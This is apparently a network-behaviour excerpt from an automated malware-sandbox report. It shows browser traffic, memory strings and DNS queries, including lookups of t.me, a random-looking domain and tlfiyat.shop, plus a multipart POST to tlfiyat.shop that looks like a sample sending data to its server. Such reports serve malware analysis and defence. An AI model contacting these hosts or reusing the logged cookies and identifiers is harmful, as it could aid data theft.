Source: global traffic HTTP traffic detected: GET /service/segments/recoitems/weather?apikey=UhJ4G66OjyLbn9mXARgajXLiLw6V75sHnfpU60aJBB&activityId=3A35C6D9-C75F-44F1-A696-E1F20ED10EDD&ocid=weather-peregrine&cm=en-us&it=app&user=m-36CB6A348F62672B3E3A7F498E00663A&scn=APP_ANON&appId=4de6fc9f-3262-47bf-9c99-e189a8234fa2&wrapodata=false&includemapsmetadata=true&cuthour=true&filterRule=card&distanceinkm=0&regionDataCount=20&orderby=distance&days=5&pageOcid=anaheim-dhp-peregrine&source=undefined_csr&hours=13&fdhead=prg-1sw-wxnhcolk%2Cprg-1sw-wxomghd%2Cprg-1s-wxtrendv3&contentcount=3&region=us&market=en-us&locale=en-us HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-coach-mark.e0a347064ee12e08d080.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-placement-manager.22770b41d6c1d2bc6531.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/SunnyDayV3.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/digest-card.5fe6cd7db56d38e3fbc9.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_ad-service_dist_NativeAdService_js.be817f1621a33c798f12.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_ad-service-base_dist_msnKVService_js-libs_ads-constants_dist_template-configs_infopane_D-a5042d.2a8a605c0e73e437d940.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_social-data-service_dist_service_SocialService_js.d0196b6bd9fdaa9d5a17.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_super-feed_dist_feed-manager_FeedManagerWithClientAd_js.dcd038378840e752a33e.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: ff6a6aa9-b5a5-43f5-954c-b3c7085a243c.tmp.26.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820504438.0000203400D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2736084867.0000203400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2736169387.0000203400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2736237918.0000203400454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000013.00000003.2736084867.0000203400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2736169387.0000203400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2736237918.0000203400454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000013.00000002.2827197419.0000203401B30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2767897495.0000203401B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827261354.0000203401B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca= 4 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2767897495.0000203401B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827261354.0000203401B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2767988556.0000203401B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819353678.0000203400C54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820323001.0000203400D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826886665.0000203401B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2826886665.0000203401B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820504438.0000203400D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/ 4 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820504438.0000203400D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: OMTkTMNzXANwD.OMTkTMNzXANwD
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tlfiyat.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic DNS traffic detected: DNS query: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: sb.scorecardresearch.com
Source: unknown DoH DNS queries detected: name: sb.scorecardresearch.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: browser.events.data.msn.com
Source: unknown DoH DNS queries detected: name: browser.events.data.msn.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----iw479riw47g4e3w4eu37User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Access-Control-Allow-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigrated,DDD-TMPL-Removed,deviceFeatures,Server-Timing,DDD-LocationAssignedAccess-Control-Expose-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigrated,DDD-TMPL-Removed,deviceFeatures,Server-Timing,DDD-LocationAssignedDDD-AuthenticatedWithJwtFlow: FalseDDD-UserType: AnonymousMuidDDD-StrategyExecutionLatency: 00:00:00.0017423,00:00:00.0018885DDD-ActivityId: 812adf43-b823-4d90-b532-fff661a0f346DDD-TMPL-Removed: FalseDDD-DebugId: 812adf43-b823-4d90-b532-fff661a0f346|2025-01-23T19:40:18.8651661Z|fabric_msn|EUS2-A|News_98DDD-Auth-Features: AT:NA;DID:m-36CB6A348F62672B3E3A7F498E00663A;IT:App;MuidStateOrigin:MuidFromCookieOneWebServiceLatency: 3X-MSEdge-ResponseInfo: 3Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAX-Ceto-ref: 67929b226a6b4776a3e449b3949009ed|AFD:67929b226a6b4776a3e449b3949009ed|2025-01-23T19:40:18.859ZX-MSEdge-Ref: Ref A: 57804B6D80F348E494FD0A6AC8A6D557 Ref B: BL2AA2030103007 Ref C: 2025-01-23T19:40:18ZExpires: Thu, 23 Jan 2025 19:40:18 GMTDate: Thu, 23 Jan 2025 19:40:18 GMTContent-Length: 88Connection: closeSet-Cookie: _C_ETH=1; expires=Wed, 22 Jan 2025 19:40:18 GMT; domain=.msn.com; path=/; secure; httponlySet-Cookie: _C_Auth=Set-Cookie: MUIDB=36CB6A348F62672B3E3A7F498E00663A; expires=Tue, 17 Feb 2026 19:40:18 GMT; path=/; httponlySet-Cookie: _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; domain=.msn.com; path=/; httponlyAlt-Svc: h3=":443"; ma=86400Akamai-Request-BC: [a=23.200.89.146,b=7790077,c=g,n=US_NJ_SECAUCUS,o=20940],[a=131.253.33.203,c=o]
Source: chrome.exe, 00000013.00000002.2814733100.00002034003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818725480.0000203400AD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078ernt
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452er4
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818725480.0000203400AD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
